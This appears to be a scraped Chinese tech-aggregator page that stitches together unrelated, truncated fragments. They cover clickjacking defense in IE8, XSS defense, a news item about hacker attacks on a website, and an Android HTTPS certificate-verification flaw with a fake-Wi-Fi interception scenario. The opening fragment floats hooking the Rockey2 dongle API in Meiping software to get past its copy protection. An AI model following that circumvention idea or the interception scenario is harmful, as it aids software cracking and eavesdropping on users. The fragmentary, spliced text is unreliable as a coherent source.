其实还想到一种可能更简单的方法,直接劫持静态连接进美萍的Rockey2的接口函数,不过美萍似乎是The Enigma Protector加壳的,据说是个强壳,API劫持是需要修改函数头几个字节的,我怕壳一掺和会出问题,比如UNHook时万一是壳又加密过了,那就悲剧了 另:希望有臭味相投的朋友来一起交流,交流才能进步嘛。
[Web开发] IE8中如何防御网站被Clickjacking攻击
Clickjacking (点击劫持)是近期新发现的一种浏览器攻击手段,危害极大。 黑客可以通过该方法控制用户的浏览器点击行为:用户点击链接、按钮或者网上任意的东西都可能被引导至其他地址。黑客可以利用"clickjacking"控制摄像头和麦克风,窥探用户隐私,在用户机器上植入病毒木马。
IE8 针对Clickjacking 增加对Clickjacking攻击的防御功能。 只要你的服务器的HTTP response 里面加入X-FRAME-OPTIONS: DENY ,该功能就会被开启。
ASP.NET 示例代码: this.Response.Headers["X-FRAME-OPTIONS"] = "DENY";
你也可以在IIS 里面设置该选项。
IEblog 上有更详细关于这个功能的解释:链接地址
自己的记录页面中,稍做分析便获取了用户的敏感信息。
跨站脚本攻击的危险,在如今WEB安全越来越得到重视,他的危险性也越来越大。有效防止跨站脚本攻击,是WEB程序是否安全的一个重要标准。
链接地址3. 如何防止跨站脚本攻击 链接地址3.1 主要防御方式 防御手段一:编码输出 保护级别:★★★★★ 描述:
对于不支持HTML代码的地方,可用编码输出。如:HtmlEncode、Server.UrlEncode等方法编码输出。 优点:安全可靠。 缺点:不支持HTML代码
黑客穷追不舍攻击“谷姐” [转]
网络科技公司,着手开发新软件,打造自己的“创新内核”,应对挑战。 A升级用群 组服务器 昨日,接受记者采访时,“谷姐”网站管理员小炫首先谈及近来被热炒的黑客攻击事件。据小炫介绍,“谷姐”的安防人员已经通过反追踪手段发现,黑客地址大部分来自美国。“黑客攻击一直没有断,最近网站比较稳定,是因为我们加强了防御。遇到黑客攻击我们也很无奈,黑客们利用DOOS洪水攻击、APP欺骗攻击、社会攻击、网站程序入侵攻击,在黑客领域能用的方法都用在‘谷姐’身上了。尤其是社会攻击让我们感觉到个人隐私的重要性,黑客利用我个人
Android平台https嗅探劫持漏洞
(HostnameVerifier)部分,情况和上面说到的及其类似,因此不再赘述。 想要利用这个漏洞进行攻击,我们需要能够进行流量劫持,去截获并修改https握手时数据包:将握手时的服务器下发的证书,替换成我们伪造的假证书。随后,全部的https数据都在我们的监控之下,如果需要,甚至可以随意篡改数据包的内容。下面我们看看典型的恶意场景。 1. 伪造公众wifi进行劫持 某日,一名黑客带着他那台装满了“武器”的笔记本,激活了早已准备好的aircrack,静静的在星巴克坐了一个下午,夕阳西下,黑客握着一杯星巴克咖啡
& 2012 - 2016 & aiuxian.com &All Rights Reserved. &
/*爱悠闲图+*/
var cpro_id = "u1888441";
